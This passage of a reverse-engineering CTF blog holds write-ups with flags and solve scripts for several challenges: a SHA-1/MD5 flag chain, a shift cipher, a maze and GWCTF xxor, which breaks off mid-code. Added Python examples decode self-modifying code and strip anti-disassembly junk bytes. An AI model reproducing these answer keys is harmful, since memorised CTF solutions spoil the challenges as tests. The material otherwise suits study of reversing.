src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week2/image-20201226085141053.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week2/image-20201226085141053.png" srcset="" alt="image-20201226085141053">The idea is simple: “<code>DD01903921EA24941C26A48F2CEC24E0BB0E8CC7</code>” is a <code>SHA1</code> digest, which cannot be decrypted but can be looked up (or brute-forced over short inputs): it is the hash of <code>1001</code>. <code>md5</code> that value: “<code>b8c37e33defde51cf91e1e03e51657da</code>”. Then follow into the <code>md5</code> routine:<br><img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week2/image-20201226085152993.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week2/image-20201226085152993.png" srcset="" alt="image-20201226085152993">Well, it keeps only the first 20 characters...<br><code>BJDCTF{b8c37e33defde51cf91e}</code></p><p>But the two questions at the start still bother me... I do not quite get it.</p><p>PS: </p><p> RX answered those two questions; his professional reply was: look here: <a href="https://docs.unity3d.com/Manual/ScriptCompilationAssemblyDefinitionFiles.html">Unity - Manual: Assembly definitions (unity3d.com)</a></p>]]></content>
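<![CDATA[<p>The SMC section above turns on one check: whether the stub may write to the code it is about to decode. For a PE that is decided by the characteristics of the section holding the address (<code>IMAGE_SCN_MEM_WRITE</code> together with <code>IMAGE_SCN_MEM_EXECUTE</code>), not by NX on the stack; a writable <code>.text</code> is exactly why no permission-changing call was needed. The following added Python example, not the challenge's code or RX's script, parses a PE section table, answers that question for an address, maps the address to a file offset, and applies the same XOR decode as the IDAPython loop to a file buffer. The PE image, the stub bytes and the address <code>0x401100</code> are constructed for the example; <code>0x408b06</code>, <code>0x138</code> and the key <code>74</code> are only quoted from the page's script.</p>

```python
"""Is the code at an address writable, and what does the SMC stub decode?

Added example for the SMC section; the PE image is constructed here and the
values 0x408b06 / 0x138 / 74 are only quoted from the page's IDAPython script.
"""
import struct

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
SECTION_HDR = "<8sIIIIIIHHI"     # IMAGE_SECTION_HEADER, 40 bytes


def pe_sections(image):
    """Parse the section table of a PE file held in memory as bytes."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                                        # IMAGE_FILE_HEADER
    nsections = struct.unpack_from("<H", image, coff + 2)[0]
    opt_size = struct.unpack_from("<H", image, coff + 16)[0]    # SizeOfOptionalHeader
    table = coff + 20 + opt_size
    sections = []
    for i in range(nsections):
        f = struct.unpack_from(SECTION_HDR, image, table + 40 * i)
        sections.append({"name": f[0].rstrip(b"\0").decode(), "vsize": f[1], "va": f[2],
                         "rawsize": f[3], "rawptr": f[4], "flags": f[9]})
    return sections


def section_for_va(image, image_base, va):
    rva = va - image_base
    for s in pe_sections(image):
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["rawsize"]):
            return s
    return None


def can_self_modify(image, image_base, va):
    """True when the section holding `va` is both writable and executable.

    That is the situation the page describes: the stub can XOR its own code in
    place with no VirtualProtect call. A normal R+X .text would fault on the write.
    """
    s = section_for_va(image, image_base, va)
    return (s is not None and (s["flags"] & IMAGE_SCN_MEM_WRITE) != 0
            and (s["flags"] & IMAGE_SCN_MEM_EXECUTE) != 0)


def va_to_offset(image, image_base, va):
    s = section_for_va(image, image_base, va)
    if s is None:
        raise ValueError("address not backed by a section")
    return s["rawptr"] + (va - image_base - s["va"])


def xor_decode(image, offset, length, key):
    """The page's IDAPython loop applied to a file buffer (XOR is its own inverse)."""
    out = bytearray(image)
    for i in range(offset, offset + length):
        out[i] ^= key
    return bytes(out)


def build_image(text_flags, payload=b"", payload_off=0):
    """Constructed 32-bit PE: one .text section, RVA 0x1000, file offset 0x200, 0x200 bytes."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                         # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0, 0x0102)  # i386, 1 section, no optional header
    sec = struct.pack(SECTION_HDR, b".text", 0x1000, 0x1000, 0x200, 0x200, 0, 0, 0, 0, text_flags)
    header = bytes(dos) + b"PE\0\0" + coff + sec
    text = bytearray(0x200)
    text[payload_off:payload_off + len(payload)] = payload
    return header + b"\0" * (0x200 - len(header)) + bytes(text)


IMAGE_BASE = 0x400000
STUB_VA = 0x401100                    # constructed address inside .text (RVA 0x1100)
STUB = bytes.fromhex("31c0c3")        # xor eax, eax ; ret  (the "real" code)
KEY = 74                              # same key as the page's script
ENCRYPTED = bytes(b ^ KEY for b in STUB)


def demo():
    """(writable+executable .text can SMC, read-only .text can SMC, decoded stub)."""
    rwx = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
    rx = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ
    image = build_image(rwx, ENCRYPTED, STUB_VA - IMAGE_BASE - 0x1000)
    off = va_to_offset(image, IMAGE_BASE, STUB_VA)
    decoded = xor_decode(image, off, len(STUB), KEY)[off:off + len(STUB)]
    return (can_self_modify(image, IMAGE_BASE, STUB_VA),
            can_self_modify(build_image(rx), IMAGE_BASE, STUB_VA), decoded)


if __name__ == "__main__":
    print(demo())
```

<p>Decoding in the file this way gives the same bytes IDA shows after the script, and the two <code>can_self_modify</code> results make the permission point concrete: with <code>.text</code> marked <code>R+X</code> only, the stub would need a <code>VirtualProtect</code> (or an equivalent) before its first write.</p>]]>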
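<![CDATA[<p>The <code>je X ; jnz X</code> pattern from the ByteCTF section is mechanical enough to clean up with a script. The following added Python example, not code from the challenge, scans a raw code buffer for conditional pairs that both land on the same address past their fall-through, and either NOPs the junk byte(s) or rewrites the pair as a plain <code>jmp</code>; the sample bytes are constructed and place a stray <code>E8</code> at the fall-through, the way a bogus <code>call</code> start would derail linear disassembly.</p>

```python
"""Find and neutralise the `je X ; jnz X` junk pattern from the ByteCTF section.

Added example; the code bytes below are constructed,
not taken from the TikTokAdmin binary.
"""
JE_REL8, JNZ_REL8, JMP_REL8, NOP = 0x74, 0x75, 0xEB, 0x90


def _rel8(b):
    """Signed 8-bit displacement."""
    return b - 256 if b >= 0x80 else b


def find_je_jnz_pairs(code):
    """Return (offset, target) for every `je T ; jnz T` pair whose T lies past the fall-through.

    je and jnz to the same address are an unconditional jump; the bytes between
    the jnz and T are never executed and only exist to derail linear disassembly.
    """
    pairs = []
    for off in range(0, len(code) - 3):
        if code[off] != JE_REL8 or code[off + 2] != JNZ_REL8:
            continue
        t_je = off + 2 + _rel8(code[off + 1])      # rel8 is relative to the next instruction
        t_jnz = off + 4 + _rel8(code[off + 3])
        if t_je == t_jnz and t_je > off + 4:
            pairs.append((off, t_je))
    return pairs


def remove_junk(code, use_jmp=False):
    """NOP the junk bytes, or rewrite the pair as `jmp rel8` followed by NOPs."""
    out = bytearray(code)
    for off, target in find_je_jnz_pairs(code):
        if use_jmp:
            out[off] = JMP_REL8
            out[off + 1] = (target - (off + 2)) & 0xFF   # relative to the end of the jmp
            out[off + 2:target] = bytes([NOP]) * (target - off - 2)
        else:
            out[off + 4:target] = bytes([NOP]) * (target - off - 4)
    return bytes(out)


# constructed: je +3 ; jnz +1 ; E8 (junk byte, looks like a call) ; xor eax,eax ; ret
SAMPLE = bytes.fromhex("7403" "7501" "e8" "31c0" "c3")


if __name__ == "__main__":
    print(find_je_jnz_pairs(SAMPLE), remove_junk(SAMPLE).hex())
```

<p>After the NOP variant the bytes read <code>74 03 75 01 90 31 C0 C3</code>, which IDA disassembles straight through; a pair with different targets (a genuine branch) is left alone. In IDA itself the same fix is the <code>patch</code> plus <code>P</code> the writeup mentions.</p>]]>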
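<![CDATA[<p>For the attachment challenge, the hash chain described above (match the SHA-1 digest, MD5 the recovered value, keep 20 hex characters) can be reproduced offline; this added Python example is not the game's code. It brute-forces short numeric strings against the digest the page quotes, since a hash is matched rather than decrypted, then builds the flag. The search space (digits, up to four characters) is an assumption that happens to cover <code>1001</code>.</p>

```python
"""Added example for the attachment challenge: invert the SHA-1 by brute force over
short numeric strings, then MD5 the recovered value and keep the first 20 hex characters.
"""
import hashlib
import itertools

SHA1_TARGET = "dd01903921ea24941c26a48f2cec24e0bb0e8cc7"   # digest from the page, lower-cased


def crack_sha1(target_hex, max_len=4, alphabet="0123456789"):
    """Return the shortest string over `alphabet` whose SHA-1 equals target_hex, or None.

    A hash is not decrypted; candidates are hashed and compared. Digits up to four
    characters is an assumption chosen for this example.
    """
    target = bytes.fromhex(target_hex)
    for n in range(1, max_len + 1):
        for tup in itertools.product(alphabet, repeat=n):
            cand = "".join(tup)
            if hashlib.sha1(cand.encode()).digest() == target:
                return cand
    return None


def md5_prefix(s, n=20):
    """Hex MD5 of `s`, truncated to n characters as the game's check does."""
    return hashlib.md5(s.encode()).hexdigest()[:n]


def solve(target_hex=SHA1_TARGET):
    """Full chain: SHA-1 preimage -> MD5 -> first 20 hex chars -> flag."""
    pre = crack_sha1(target_hex)
    if pre is None:
        return None
    return "BJDCTF{" + md5_prefix(pre) + "}"


if __name__ == "__main__":
    print(solve())
```]]>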
<categories>
<category> CTF学习笔记 </category>
</categories>
<tags>
<tag> CTF </tag>
<tag> RE </tag>
</tags>
</entry>
<entry>
<title>Re学习之RX引路_week1</title>
<link href="2021/02/23/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week1/"/>
<url>2021/02/23/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week1/</url>
<content type="html"><![CDATA[<h3 id="DMCTF-2020-re1"><a href="#DMCTF-2020-re1" class="headerlink" title="DMCTF 2020 re1"></a>DMCTF 2020 re1</h3><p>The challenge is called "a simple algorithm problem". <code>Peid</code> finds no packer and no known algorithm, so into <code>IDA</code>.</p><p>Locate <code>main</code> and rename things, all in one go:</p><p><img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week1/image-20201208113709778.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week1/image-20201208113709778.png" srcset="" alt="image-20201208113709778"></p><p>Guessing that <code>sub_485D1A</code> wraps <code>strlen</code>; stepping in confirms it, more or less. The <code>flag</code> must be <code>20</code> characters long.</p><p>Then look into <code>sub_4849EC</code>:</p><p><img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week1/image-20201208114054449.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week1/image-20201208114054449.png" srcset="" alt="image-20201208114054449"></p><p>Tidied up:</p><p><img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week1/image-20201208114221003.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week1/image-20201208114221003.png" srcset="" alt="image-20201208114221003"></p><p>Much easier on the eyes. It looks like a Caesar-style shift applied to reversed 4-byte chunks, so straight to the script:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line">ans=[]</span><br><span class="line">a=[<span class="number">0x73</span>,<span class="number">0x65</span>,<span class="number">0x6D</span>,<span class="number">0x66</span>]</span><br><span class="line">a=a[::-<span class="number">1</span>]</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> a:</span><br><span class="line">    ans.append(i)</span><br><span class="line"></span><br><span class="line">a=[<span class="number">0x6D</span>,<span class="number">0x75</span>,<span class="number">0x7B</span>,<span class="number">0x68</span>]</span><br><span class="line">a=a[::-<span class="number">1</span>]</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> a:</span><br><span class="line">    ans.append(i)</span><br><span class="line"></span><br><span class="line">a=[<span class="number">0x76</span>,<span class="number">0x5F</span>,<span class="number">0x63</span>,<span class="number">0x6B</span>]</span><br><span class="line">a=a[::-<span class="number">1</span>]</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> a:</span><br><span class="line">    ans.append(i)</span><br><span class="line"></span><br><span class="line">a=[<span class="number">0x5F</span>,<span class="number">0x6E</span>,<span class="number">0x72</span>,<span class="number">0x6C</span>]</span><br><span class="line">a=a[::-<span class="number">1</span>]</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> a:</span><br><span class="line">    ans.append(i)</span><br><span class="line"></span><br><span class="line">a=[<span class="number">0x7D</span>,<span class="number">0x68</span>,<span class="number">0x6C</span>,<span class="number">0x67</span>]</span><br><span class="line">a=a[::-<span class="number">1</span>]</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> a:</span><br><span class="line">    ans.append(i)</span><br><span class="line"></span><br><span class="line"><span class="comment"># ans=[102, 109, 101, 115, 104, 123, 117, 109, 107, 99, 95, 118, 108, 114, 110, 95, 103, 108, 104, 125]</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> ans:</span><br><span class="line">    <span class="keyword">if</span> i>=<span class="built_in">ord</span>(<span class="string">'a'</span>) <span class="keyword">and</span> i<=<span class="built_in">ord</span>(<span class="string">'k'</span>):</span><br><span class="line">        print(<span class="built_in">chr</span>(i-<span class="number">2</span>),end=<span class="string">''</span>)</span><br><span class="line">    <span class="keyword">elif</span> i>=<span class="built_in">ord</span>(<span class="string">'o'</span>) <span class="keyword">and</span> i<=<span class="built_in">ord</span>(<span class="string">'y'</span>):</span><br><span class="line">        print(<span class="built_in">chr</span>(i+<span class="number">1</span>),end=<span class="string">''</span>)</span><br><span class="line">    <span class="keyword">elif</span> i==<span class="built_in">ord</span>(<span class="string">'l'</span>) <span class="keyword">or</span> i==<span class="built_in">ord</span>(<span class="string">'m'</span>):</span><br><span class="line">        print(<span class="string">"("</span>,<span class="built_in">chr</span>(i-<span class="number">2</span>),<span class="built_in">chr</span>(i),<span class="string">")"</span>,end=<span class="string">''</span>)</span><br><span class="line">    <span class="keyword">elif</span> i==<span class="built_in">ord</span>(<span class="string">'n'</span>):</span><br><span class="line">        print(<span class="string">"("</span>,<span class="built_in">chr</span>(i),<span class="built_in">chr</span>(i+<span class="number">1</span>),<span class="string">")"</span>,end=<span class="string">''</span>)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        print(<span class="built_in">chr</span>(i),end=<span class="string">''</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># d( k m )ctf{v( k m )ia_w( j l )s( n o )_e( j l )f}</span></span><br></pre></td></tr></table></figure><p>The characters in parentheses are the positions where the shift is not invertible, so this challenge apparently has several valid answers; <code>RX</code> confirmed this.</p><h3 id="DMCTF-2020-re4"><a href="#DMCTF-2020-re4" class="headerlink" title="DMCTF 2020 re4"></a>DMCTF 2020 re4</h3><p><code>DIE</code> finds no packer. Drag it into <code>IDA</code>, check the strings, locate <code>main</code>:</p><p><img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week1/image-20201208165837990.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week1/image-20201208165837990.png" srcset="" alt="image-20201208165837990"></p><p>From the part in the red box, guess it is a maze.<br>Extract the map:</p><blockquote><p>1 0 0 0 0 1 1 0 0 0<br>1 1 0 0 0 1 1 1 0 0<br>0 1 0 0 0 1 0 1 0 0<br>0 1 1 1 1 1 0 1 0 0<br>0 0 0 0 1 1 0 1 0 0<br>0 0 0 0 0 0 0 1 0 0<br>0 0 0 0 0 0 0 1 1 0<br>0 0 0 0 0 0 0 0 1 0<br>0 0 0 0 0 0 0 0 1 1<br>0 0 0 0 0 0 0 0 0 1 </p></blockquote><p>The move handling:</p><p><img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week1/image-20201208165940558.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week1/image-20201208165940558.png" srcset="" alt="image-20201208165940558"></p><p>Walk the maze by hand, from the top-left to the bottom-right; first as <code>wasd</code> moves, then the same path as the digits the binary expects (s=2, d=0, w=3):</p><blockquote><p>sdssdddsdwwwwdsdsssssdssds<br>20220002033330202222202202</p></blockquote><p>Run it:</p><p><img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week1/image-20201208170029486.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week1/image-20201208170029486.png" srcset="" alt="image-20201208170029486"></p><h3 id="GWCTF-2019-xxor"><a href="#GWCTF-2019-xxor" class="headerlink" title="GWCTF 2019 xxor"></a>GWCTF 2019 xxor</h3><p><code>DIE</code> shows nothing special. Into <code>IDA64</code>, and, <code>woc</code>, a nice surprise: the symbol table was not stripped!!!</p><p>Find <code>main</code>. The raw decompilation first:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">__int64 __fastcall <span class="title">main</span><span class="params">(<span class="keyword">int</span> a1, <span class="keyword">char</span> **a2, <span class="keyword">char</span> **a3)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line">  <span class="keyword">int</span> i; <span class="comment">// [rsp+8h] [rbp-68h]</span></span><br><span class="line">  <span class="keyword">int</span> j; <span class="comment">// [rsp+Ch] [rbp-64h]</span></span><br><span class="line">  __int64 v6[<span class="number">6</span>]; <span class="comment">// [rsp+10h] [rbp-60h] BYREF</span></span><br><span class="line">  __int64 v7[<span class="number">6</span>]; <span class="comment">// [rsp+40h] [rbp-30h] BYREF</span></span><br><span class="line"></span><br><span class="line">  v7[<span class="number">5</span>] = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"Let us play a game?"</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"you have six chances to input"</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"Come on!"</span>);</span><br><span class="line">  v6[<span class="number">0</span>] = <span class="number">0LL</span>;</span><br><span class="line">  v6[<span class="number">1</span>] = <span class="number">0LL</span>;</span><br><span class="line">  v6[<span class="number">2</span>] = <span class="number">0LL</span>;</span><br><span class="line">  v6[<span class="number">3</span>] = <span class="number">0LL</span>;</span><br><span class="line">  v6[<span class="number">4</span>] = <span class="number">0LL</span>;</span><br><span class="line">  <span class="keyword">for</span> ( i = <span class="number">0</span>; i <= <span class="number">5</span>; ++i )</span><br><span class="line">  {</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">"%s"</span>, <span class="string">"input: "</span>);</span><br><span class="line">    a2 = (<span class="keyword">char</span> **)((<span class="keyword">char</span> *)v6 + <span class="number">4</span> * i);</span><br><span class="line">    __isoc99_scanf(<span class="string">"%d"</span>, a2);</span><br><span class="line">  }</span><br><span class="line">  v7[<span class="number">0</span>] = <span class="number">0LL</span>;</span><br><span class="line">  v7[<span class="number">1</span>] = <span class="number">0LL</span>;</span><br><span class="line">  v7[<span class="number">2</span>] = <span class="number">0LL</span>;</span><br><span class="line">  v7[<span class="number">3</span>] = <span class="number">0LL</span>;</span><br><span class="line">  v7[<span class="number">4</span>] = <span class="number">0LL</span>;</span><br><span class="line">  <span class="keyword">for</span> ( j = <span class="number">0</span>; j <= <span class="number">2</span>; ++j )</span><br><span class="line">  {</span><br><span class="line">    dword_601078 = v6[j];</span><br><span class="line">    dword_60107C = HIDWORD(v6[j]);</span><br><span class="line">    a2 = (<span class="keyword">char</span> **)&unk_601060;</span><br><span class="line">    sub_400686(&dword_601078, &unk_601060);</span><br><span class="line">    LODWORD(v7[j]) = dword_601078;</span><br><span class="line">    HIDWORD(v7[j]) = dword_60107C;</span><br><span class="line">  }</span><br><span class="line">  <span class="keyword">if</span> ( (<span class="keyword">unsigned</span> <span class="keyword">int</span>)sub_400770(v7, a2) != <span class="number">1</span> )</span><br><span class="line">  {</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">"NO NO NO~ "</span>);</span><br><span class="line">    <span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line">  }</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"Congratulation!\n"</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"You seccess half\n"</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"Do not forget to change input to hex and combine~\n"</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"ByeBye"</span>);</span><br><span class="line">  <span class="keyword">return</span> <span class="number">0LL</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>And the same function after renaming the variables and the two helpers (<code>sub_400686</code> becomes <code>change</code>, <code>sub_400770</code> becomes <code>check</code>):</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">__int64 __fastcall <span class="title">main</span><span class="params">(__int64 a1, <span class="keyword">char</span> **a2, <span class="keyword">char</span> **a3)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line">  <span class="keyword">signed</span> <span class="keyword">int</span> i; <span class="comment">// [rsp+8h] [rbp-68h]</span></span><br><span class="line">  <span class="keyword">signed</span> <span class="keyword">int</span> j; <span class="comment">// [rsp+Ch] [rbp-64h]</span></span><br><span class="line">  __int64 input[<span class="number">5</span>]; <span class="comment">// [rsp+10h] [rbp-60h]</span></span><br><span class="line">  __int64 flag_enc[<span class="number">5</span>]; <span class="comment">// [rsp+40h] [rbp-30h]</span></span><br><span class="line">  <span class="keyword">unsigned</span> __int64 v8; <span class="comment">// [rsp+68h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  v8 = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"Let us play a game?"</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"you have six chances to input"</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"Come on!"</span>);</span><br><span class="line">  input[<span class="number">0</span>] = <span class="number">0LL</span>;</span><br><span class="line">  input[<span class="number">1</span>] = <span class="number">0LL</span>;</span><br><span class="line">  input[<span class="number">2</span>] = <span class="number">0LL</span>;</span><br><span class="line">  input[<span class="number">3</span>] = <span class="number">0LL</span>;</span><br><span class="line">  input[<span class="number">4</span>] = <span class="number">0LL</span>;</span><br><span class="line">  <span class="keyword">for</span> ( i = <span class="number">0</span>; i <= <span class="number">5</span>; ++i )</span><br><span class="line">  {</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">"%s"</span>, <span class="string">"input: "</span>, (<span class="keyword">unsigned</span> <span class="keyword">int</span>)i);</span><br><span class="line">    __isoc99_scanf(<span class="string">"%d"</span>, (<span class="keyword">char</span> *)input + <span class="number">4</span> * i);</span><br><span class="line">  }</span><br><span class="line">  flag_enc[<span class="number">0</span>] = <span class="number">0LL</span>;</span><br><span class="line">  flag_enc[<span class="number">1</span>] = <span class="number">0LL</span>;</span><br><span class="line">  flag_enc[<span class="number">2</span>] = <span class="number">0LL</span>;</span><br><span class="line">  flag_enc[<span class="number">3</span>] = <span class="number">0LL</span>;</span><br><span class="line">  flag_enc[<span class="number">4</span>] = <span class="number">0LL</span>;</span><br><span class="line">  <span class="keyword">for</span> ( j = <span class="number">0</span>; j <= <span class="number">2</span>; ++j )</span><br><span class="line">  {</span><br><span class="line">    tmp_0_ = input[j];</span><br><span class="line">    tmp_1_ = *((_DWORD *)input + j * <span class="number">2</span> + <span class="number">1</span>);</span><br><span class="line">    <span class="comment">// tmp_0_ and tmp_1_ looked like two unrelated variables, but change() takes a pointer and also modifies tmp_1_, so they should be treated as one two-element array</span></span><br><span class="line">    change((<span class="keyword">unsigned</span> <span class="keyword">int</span> *)&tmp_0_, &table);</span><br><span class="line">    LODWORD(flag_enc[j]) = tmp_0_;</span><br><span class="line">    *((_DWORD *)flag_enc + j * <span class="number">2</span> + <span class="number">1</span>) = tmp_1_;</span><br><span class="line">  }</span><br><span class="line">  <span class="keyword">if</span> ( (<span class="keyword">unsigned</span> <span class="keyword">int</span>)check(flag_enc) != <span class="number">1</span> )</span><br><span class="line">  {</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">"NO NO NO~ "</span>);</span><br><span class="line">    <span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line">  }</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"Congratulation!\n"</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"You seccess half\n"</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"Do not forget to change input to hex and combine~\n"</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"ByeBye"</span>);</span><br><span class="line">  <span class="keyword">return</span> <span class="number">0LL</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>The flow is clear: six 32-bit inputs are read, <code>change</code> transforms them pairwise, <code>check</code> compares the result, and that decides the outcome.</p><p>First the <code>check</code> function, cleaned up:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">signed</span> __int64 __fastcall <span class="title">check</span><span class="params">(_DWORD *a1)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line">  <span class="keyword">signed</span> __int64 result; <span class="comment">// rax</span></span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> ( a1[<span class="number">2</span>] - a1[<span class="number">3</span>] != <span class="number">0x84A236FF</span>LL || a1[<span class="number">3</span>] + a1[<span class="number">4</span>] != <span class="number">0xFA6CB703</span>LL || 